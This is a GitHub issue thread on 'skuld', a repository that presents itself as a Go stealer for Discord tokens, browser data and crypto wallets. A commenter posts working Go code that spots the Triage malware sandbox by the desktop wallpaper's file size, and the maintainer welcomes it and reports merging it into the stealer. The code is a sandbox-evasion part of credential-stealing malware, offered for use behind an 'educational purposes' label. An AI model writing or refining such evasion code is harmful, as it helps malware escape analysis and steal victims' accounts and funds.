hackirby / skuld

Next-Gen Stealer written in Go. Stealing from Discord, Chromium-Based & Firefox-Based Browsers, Crypto Wallets and more, from every user on every disk. (PoC. For educational purposes only)
MIT License
157 stars 42 forks

triage detection #40

Closed mahdisbetter closed 2 months ago

mahdisbetter commented 2 months ago

I don't code in Golang; I just asked ChatGPT to convert my Python version to Golang. OK, but you need to add this (it's stupid, with a 100% success rate):

//go:build windows

// Triage sandbox check: ask Windows for the current desktop wallpaper path and
// compare the wallpaper's file size against known sandbox wallpaper sizes.
// syscall.NewLazyDLL only exists on Windows, so this file is Windows-only.
package main

import (
    "bufio"
    "fmt"
    "os"
    "syscall"
    "unsafe"
)

const (
    // SPI_GETDESKWALLPAPER: SystemParametersInfoW action that copies the
    // current wallpaper path into the caller's buffer.
    spiGetDesktopWallpaper = 0x0073
    // MAX_PATH; uiParam is the buffer length in UTF-16 characters, not bytes.
    bufferSize = 260
)

// badWallpapers maps the file size (in bytes) of a known sandbox wallpaper to
// the detection label reported for it. Only the Triage wallpaper is listed.
// Size-only matching is deliberately cheap; any file of exactly this size on a
// real machine would also trigger it.
var badWallpapers = map[int64]string{
    24811: "wallpaper",
}

// wallpaperPath returns the current desktop wallpaper path via
// user32!SystemParametersInfoW.
func wallpaperPath() (string, error) {
    var buffer [bufferSize]uint16

    proc := syscall.NewLazyDLL("user32.dll").NewProc("SystemParametersInfoW")
    ret, _, err := proc.Call(
        uintptr(spiGetDesktopWallpaper),
        uintptr(bufferSize),
        uintptr(unsafe.Pointer(&buffer[0])),
        0, // fWinIni: read only, nothing to persist
    )
    if ret == 0 {
        // err carries GetLastError() as a syscall.Errno.
        return "", err
    }

    return syscall.UTF16ToString(buffer[:]), nil
}

// detect returns the labels of every sandbox indicator that matched.
func detect() ([]string, error) {
    path, err := wallpaperPath()
    if err != nil {
        return nil, err
    }

    // A missing or unreadable wallpaper file is not a detection.
    fileInfo, err := os.Stat(path)
    if err != nil {
        return nil, nil
    }

    var detections []string
    if label, exists := badWallpapers[fileInfo.Size()]; exists {
        detections = append(detections, label)
    }

    return detections, nil
}

func main() {
    detections, err := detect()
    if err != nil {
        fmt.Println("Error:", err)
        return
    }

    fmt.Printf("detections: %v\n", detections)

    // Keep the console window open until Enter is pressed.
    bufio.NewReader(os.Stdin).ReadBytes('\n')
}
hackirby commented 2 months ago

Thank you for opening this issue and sharing the code example! Your contribution is much appreciated, and it seems like a great addition to the project.

If you're up for it, would you be willing to open a pull request with the changes? This way, we can review and merge your contribution directly, and you'll also get credit for your work.

Of course, if you'd prefer not to, just let me know—I can make the changes myself based on your suggestion.

Either way, I really appreciate your input! Let me know what works best for you.

mahdisbetter commented 2 months ago

Dunno Go, tbh, but I'll try.

hackirby commented 2 months ago

Hey, I just merged your PR. Even though the code wasn't fully valid, the idea behind it is great, so thanks for that!